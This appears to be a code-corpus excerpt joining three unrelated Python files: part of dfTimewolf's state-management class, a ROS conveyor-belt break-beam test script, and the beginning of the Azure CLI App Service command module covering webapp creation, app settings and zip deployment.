for thread in threads:
thread.join()
self.CheckErrors(is_global=True)
def LoadRecipe(self, recipe):
"""Populates the internal module pool with modules declared in a recipe.
Args:
recipe (dict[str, str]): recipe declaring modules to load.
Raises:
RecipeParseError: if a module in the recipe does not exist.
"""
self.recipe = recipe
module_definitions = recipe.get('modules', [])
preflight_definitions = recipe.get('preflights', [])
for module_definition in module_definitions + preflight_definitions:
# Combine CLI args with args from the recipe description
module_name = module_definition['name']
module_class = modules_manager.ModulesManager.GetModuleByName(module_name)
if not module_class:
raise errors.RecipeParseError(
'Recipe uses unknown module: {0:s}'.format(module_name))
runtime_name = module_definition.get('runtime_name')
if not runtime_name:
runtime_name = module_name
self._module_pool[runtime_name] = module_class(self, name=runtime_name)
def AddToCache(self, name, value):
"""Thread-safe method to add data to the state's cache.
If an item with the same name is already in the cache, it will be
overwritten with the new value.
Args:
name (str): string with the name of the cache variable.
value (object): the value that will be stored in the cache.
"""
with self._state_lock:
self._cache[name] = value
def GetFromCache(self, name, default_value=None):
"""Thread-safe method to get data from the state's cache.
Args:
name (str): string with the name of the cache variable.
default_value (object): the value that will be returned if
the item does not exist in the cache. Optional argument
and defaults to None.
Returns:
object: object from the cache that corresponds to the name, or
the value of "default_value" if the cache does not contain
the variable.
"""
with self._state_lock:
return self._cache.get(name, default_value)
def StoreContainer(self, container):
"""Thread-safe method to store data in the state's store.
Args:
container (AttributeContainer): data to store.
"""
with self._state_lock:
self.store.setdefault(container.CONTAINER_TYPE, []).append(container)
def GetContainers(self, container_class, pop=False):
"""Thread-safe method to retrieve data from the state's store.
Args:
container_class (type): AttributeContainer class used to filter data.
pop (Optional[bool]): Whether to remove the containers from the state when
they are retrieved.
Returns:
list[AttributeContainer]: attribute container objects provided in
the store that correspond to the container type.
"""
with self._state_lock:
containers = self.store.get(container_class.CONTAINER_TYPE, [])
if pop:
self.store[container_class.CONTAINER_TYPE] = []
return containers
def _SetupModuleThread(self, module_definition):
"""Calls the module's SetUp() function and sets a threading event for it.
Callback for _InvokeModulesInThreads.
Args:
module_definition (dict[str, str]): recipe module definition.
"""
module_name = module_definition['name']
runtime_name = module_definition.get('runtime_name', module_name)
logger.info('Setting up module: {0:s}'.format(runtime_name))
new_args = utils.ImportArgsFromDict(
module_definition['args'], self.command_line_options, self.config)
module = self._module_pool[runtime_name]
try:
module.SetUp(**new_args)
except errors.DFTimewolfError as exception:
msg = "A critical error occurred in module {0:s}, aborting execution."
logger.critical(msg.format(module.name))
except Exception as exception: # pylint: disable=broad-except
msg = 'An unknown error occurred in module {0:s}: {1!s}'.format(
module.name, exception)
logger.critical(msg)
# We're catching any exception that is not a DFTimewolfError, so we want
# to generate an error for further reporting.
error = errors.DFTimewolfError(
message=msg, name='state', stacktrace=traceback.format_exc(),
critical=True, unexpected=True)
self.AddError(error)
self._threading_event_per_module[runtime_name] = threading.Event()
self.CleanUp()
def SetupModules(self):
"""Performs setup tasks for each module in the module pool.
Threads declared modules' SetUp() functions. Takes CLI arguments into
account when replacing recipe parameters for each module.
"""
# Note that vars() copies the values of argparse.Namespace to a dict.
self._InvokeModulesInThreads(self._SetupModuleThread)
def _RunModuleThread(self, module_definition):
"""Runs the module's Process() function.
Callback for _InvokeModulesInThreads.
Waits for any blockers to have finished before running Process(), then
sets an Event flag declaring the module has completed.
Args:
module_definition (dict): module definition.
"""
module_name = module_definition['name']
runtime_name = module_definition.get('runtime_name', module_name)
for dependency in module_definition['wants']:
self._threading_event_per_module[dependency].wait()
module = self._module_pool[runtime_name]
# Abort processing if a module has had critical failures before.
if self._abort_execution:
logger.critical(
'Aborting execution of {0:s} due to previous errors'.format(
module.name))
self._threading_event_per_module[runtime_name].set()
self.CleanUp()
return
logger.info('Running module: {0:s}'.format(runtime_name))
try:
module.Process()
except errors.DFTimewolfError as exception:
logger.critical(
"Critical error in module {0:s}, aborting execution".format(
module.name))
except Exception as exception: # pylint: disable=broad-except
msg = 'An unknown error occurred in module {0:s}: {1!s}'.format(
module.name, exception)
logger.critical(msg)
# We're catching any exception that is not a DFTimewolfError, so we want
# to generate an error for further reporting.
error = errors.DFTimewolfError(
message=msg, name='state', stacktrace=traceback.format_exc(),
critical=True, unexpected=True)
self.AddError(error)
logger.info('Module {0:s} finished execution'.format(runtime_name))
self._threading_event_per_module[runtime_name].set()
self.CleanUp()
def RunPreflights(self):
"""Runs preflight modules."""
for preflight_definition in self.recipe.get('preflights', []):
preflight_name = preflight_definition['name']
runtime_name = preflight_definition.get('runtime_name', preflight_name)
args = preflight_definition.get('args', {})
new_args = utils.ImportArgsFromDict(
args, self.command_line_options, self.config)
preflight = self._module_pool[runtime_name]
try:
preflight.SetUp(**new_args)
preflight.Process()
finally:
self.CheckErrors(is_global=True)
def CleanUpPreflights(self):
"""Executes any cleanup actions defined in preflight modules."""
for preflight_definition in self.recipe.get('preflights', []):
preflight_name = preflight_definition['name']
runtime_name = preflight_definition.get('runtime_name', preflight_name)
preflight = self._module_pool[runtime_name]
try:
preflight.CleanUp()
finally:
self.CheckErrors(is_global=True)
def InstantiateModule(self, module_name):
"""Instantiates an arbitrary dfTimewolf module.
Args:
module_name (str): The name of the module to instantiate.
Returns:
BaseModule: An instance of a dftimewolf Module, which is a subclass of
BaseModule.
"""
module_class = modules_manager.ModulesManager.GetModuleByName(module_name)
return module_class(self)
def RunModules(self):
"""Performs the actual processing for each module in the module pool."""
self._InvokeModulesInThreads(self._RunModuleThread)
def RegisterStreamingCallback(self, target, container_type):
"""Registers a callback for a type of container.
The function to be registered should take a single parameter of type
interface.AttributeContainer.
Args:
target (function): function to be called.
container_type (type[interface.AttributeContainer]): container type on
which the callback will be called.
"""
if container_type not in self.streaming_callbacks:
self.streaming_callbacks[container_type] = []
self.streaming_callbacks[container_type].append(target)
def StreamContainer(self, container):
"""Streams a container to the callbacks that are registered to handle it.
Args:
container (interface.AttributeContainer): container instance that will be
streamed to any registered callbacks.
"""
for callback in self.streaming_callbacks.get(type(container), []):
callback(container)
def AddError(self, error):
"""Adds an error to the state.
Args:
error (errors.DFTimewolfError): The dfTimewolf error to add.
"""
if error.critical:
self._abort_execution = True
self.errors.append(error)
def CleanUp(self):
"""Cleans up after running a module.
The state's output becomes the input for the next stage. Any errors are
moved to the global_errors attribute so that they can be reported at a
later stage.
"""
# Move any existing errors to global errors
self.global_errors.extend(self.errors)
self.errors = []
def CheckErrors(self, is_global=False):
"""Checks for errors and exits if any of them are critical.
Args:
is_global (Optional[bool]): True if the global_errors attribute should
be checked. False if the error attribute should be checked.
"""
error_objects = self.global_errors if is_global else self.errors
critical_errors = False
if error_objects:
logger.error('dfTimewolf encountered one or more errors:')
for index, error in enumerate(error_objects):
logger.error('{0:d}: error from {1:s}: {2:s}'.format(
index+1, error.name, error.message))
if error.stacktrace:
for line in error.stacktrace.split('\n'):
logger.error(line)
if error.critical:
critical_errors = True
if any(error.unexpected for error in error_objects):
logger.critical('One or more unexpected errors occurred.')
logger.critical(
'Please consider opening an issue: {0:s}'.format(NEW_ISSUE_URL))
if critical_errors:
logger.critical('Critical error found. Aborting.')
sys.exit(1)
|
test_conveyor_beam.py
|
#!/usr/bin/env python
"""
Script to test that the inputs of the break beams are read correctly and that the conveyor controls are functioning correctly.
This program stops the respective conveyor for 5 seconds before resuming whenever its break beam detects something.
Author: James Lin
Date: 29/07/2020
"""
import rospy
import argparse
import threading
import time
from ur5_t2_4230.srv import (
ConveyorBeltControl,
ConveyorBeltControlRequest,
ConveyorBeltControlResponse
)
from std_msgs.msg import Bool, Empty
from ur5_t2_4230.msg import Proximity, ConveyorBeltState
SLEEP_RATE = 3 # Hz
CONVEYOR_COOLDOWN = 5 # 5 seconds
CONVEYOR_POWER = 25.00 # 25% power
class TestConveyorBeam():
def __init__(self, *args, **kwargs):
rospy.loginfo("Initialising TestConveyorBeam Node")
self._rate = rospy.Rate(SLEEP_RATE)
# Initialise Subscribers
self._bb_in_sub = rospy.Subscriber("/break_beam_in_sensor_change", Bool, self.handleProximityChange, ('in'))
self._bb_out_sub = rospy.Subscriber("/break_beam_out_sensor_change", Bool, self.handleProximityChange, ('out'))
# Initialise Publishers
self._spawn_container_pub = rospy.Publisher("/spawner/create_container", Empty, queue_size=1)
self._spawn_set_auto_pub = rospy.Publisher("/spawner/set_auto", Bool, queue_size=1)
# Initialise Client Server Handlers
rospy.loginfo("Waiting to connect with conveyor belts service...")
rospy.wait_for_service("/ur5_t2_4230/conveyor/control/in")
rospy.wait_for_service("/ur5_t2_4230/conveyor/control/out")
rospy.loginfo("Successfully connected to conveyor belts!")
self._cc_in_client = rospy.ServiceProxy("/ur5_t2_4230/conveyor/control/in", ConveyorBeltControl)
self._cc_out_client = rospy.ServiceProxy("/ur5_t2_4230/conveyor/control/out", ConveyorBeltControl)
return
def handleProximityChange(self, msg, id):
rospy.logdebug('[handleProximityChange - ' + id + '] msg: ' + str(msg))
# Incoming Objects
if not msg.data: return True
# Stop Conveyor
request = ConveyorBeltControlRequest(ConveyorBeltState(power=0.00))
if id == 'in':
# Pickable objects
# Stop Spawning Temporarily
self._spawn_set_auto_pub.publish(Bool(False))
client = self._cc_in_client
else:
# id == 'out'; Container Objects
client = self._cc_out_client
try:
response = client(request)
rospy.loginfo('Successfully stopped conveyor_belt_' + id)
self._cooldown_thread = threading.Thread(name='CooldownThread_' + id, target=self.cooldownThread, args=(client, id))
self._cooldown_thread.start()
except rospy.ServiceException as exc:
rospy.logerr("Service did not process request: " + str(exc))
return False
return True
def cooldownThread(self, client, id):
# Start Conveyor again after cooldown
rospy.logdebug('[CooldownThread_' + id + ']')
duration = 0
while duration < CONVEYOR_COOLDOWN:
rospy.logdebug('[CooldownThread_' + id + ']: ' + str(duration))
duration += 1
time.sleep(1)
# Start Conveyor again
if id == 'in':
# Resume spawning objects
self._spawn_set_auto_pub.publish(Bool(True))
else:
# Spawn the next container
self._spawn_container_pub.publish(Empty())
request = ConveyorBeltControlRequest(ConveyorBeltState(power=CONVEYOR_POWER))
try:
response = client(request)
rospy.loginfo('Successfully started conveyor_belt_' + id)
except rospy.ServiceException as exc:
rospy.logerr("Service did not process request: " + str(exc))
return
if __name__ == "__main__":
rospy.init_node('test_conveyor_beam')
TestConveyorBeam()
rospy.spin()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.web.models import (Site, SiteConfig, User, AppServicePlan, SiteConfigResource,
SkuDescription, SslState, HostNameBinding, NameValuePair,
BackupRequest, DatabaseBackupSetting, BackupSchedule,
RestoreRequest, FrequencyUnit, Certificate, HostNameSslState,
HybridConnection, RampUpRule, UnauthenticatedClientAction,
ManagedServiceIdentity, DeletedAppRestoreRequest,
DefaultErrorResponseException, SnapshotRestoreRequest,
SnapshotRecoverySource, SwiftVirtualNetwork, HostingEnvironmentProfile)
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.storage.blob import BlockBlobService, BlobPermissions
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.mgmt.network.models import Delegation
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait
from azure.cli.core.commands.client_factory import UA_AGENT
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES, LINUX_RUNTIMES, WINDOWS_RUNTIMES
from ._client_factory import web_client_factory, ex_handler_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, does_app_already_exist, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src)
from ._constants import (RUNTIME_TO_DEFAULT_VERSION, NODE_VERSION_DEFAULT_FUNCTIONAPP,
RUNTIME_TO_IMAGE_FUNCTIONAPP, NODE_VERSION_DEFAULT)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None):
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
is_linux = plan_info.reserved
node_default_version = NODE_VERSION_DEFAULT
location = plan_info.location
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags)
helper = _StackRuntimeHelper(client, linux=is_linux)
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
"Please invoke 'list-runtimes' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](match, site_config)
        # Be consistent with portal: any windows webapp should have this even if it doesn't have node in the stack
if not match['displayName'].startswith('node'):
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
    if using_webapp_up:  # when the routine is invoked as a helper method for webapp up
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
    # Ensure SCC operations follow right after the 'create', with no preceding appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
    return len([x for x in opts if x]) == 1  # you can specify only one of these options
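# A minimal illustrative sketch (added here, not from the original source): the hypothetical
# helper below only documents the expected behaviour of validate_container_app_create_options,
# which accepts exactly one of --runtime, --deployment-container-image-name, or the paired
# --multicontainer-config-type/--multicontainer-config-file options.
def _example_validate_container_app_create_options():
    assert validate_container_app_create_options(runtime='NODE|10.14') is True
    # two mutually exclusive options given at once
    assert validate_container_app_create_options(deployment_container_image_name='nginx',
                                                 runtime='NODE|10.14') is False
    # config type without the matching config file
    assert validate_container_app_create_options(multicontainer_config_type='COMPOSE') is False
    assert validate_container_app_create_options(multicontainer_config_type='COMPOSE',
                                                 multicontainer_config_file='docker-compose.yml') is True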
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
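# A minimal illustrative sketch (added here, not from the original source): the hypothetical
# helper below documents how parse_docker_image_name extracts a registry URL only when the
# part before the last '/' looks like a host (it contains '.' or ':').
def _example_parse_docker_image_name():
    assert parse_docker_image_name('myregistry.azurecr.io/nginx:latest') == 'myregistry.azurecr.io'
    assert parse_docker_image_name('localhost:5000/nginx') == 'localhost:5000'
    # 'library' has neither '.' nor ':' so it is treated as a namespace, not a registry
    assert parse_docker_image_name('library/nginx') is None
    # no '/' at all -> no registry part is returned
    assert parse_docker_image_name('nginx:latest') is None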
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
                if isinstance(temp, list):  # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
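# Illustrative note, not part of the original module: update_app_settings accepts both plain
# 'KEY=VALUE' strings and the JSON emitted by the corresponding "list" command, so either of
# the following --settings values (names and values invented for the example) is handled by
# the parsing loop above:
#
#     settings=['WEBSITE_TIME_ZONE=UTC']
#     settings=['[{"name": "FOO", "value": "bar", "slotSetting": false}]']
#
# JSON entries whose 'slotSetting' flag is true (or missing) are additionally recorded as
# slot-sticky configuration names.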
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
from azure.mgmt.web.models import AzureStorageInfoValue
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
    # We need to retry getting the plan because, when the plan is created as part of the
    # function app, it can take a few attempts before the service returns it
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
headers['User-Agent'] = UA_AGENT
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
enable_oryx_build = None
scm_do_build_during_deployment = None
website_run_from_package = None
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value in ('true', '1')
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if not ((enable_oryx_build is True) and (scm_do_build_during_deployment is True)):
logger.warning("Setting ENABLE_ORYX_BUILD to true")
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD=true",
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
time.sleep(5)
if website_run_from_package is not None:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
time.sleep(5)
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
enable_oryx_build = None
scm_do_build_during_deployment = None
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value in ('true', '1')
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if not ((enable_oryx_build is False) and (scm_do_build_during_deployment is False)):
logger.warning("Setting ENABLE_ORYX_BUILD to false")
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD=false",
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
time.sleep(5)
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
        raise CLIError('Could not find an \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
        filled_length = int(round(total_length * current / float(total)))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ce:
# This SDK function throws an error if Status Code is 200
if ce.status_code != 200:
raise ce
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
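# Illustrative sketch, not part of the original module: _generic_settings_operation only picks
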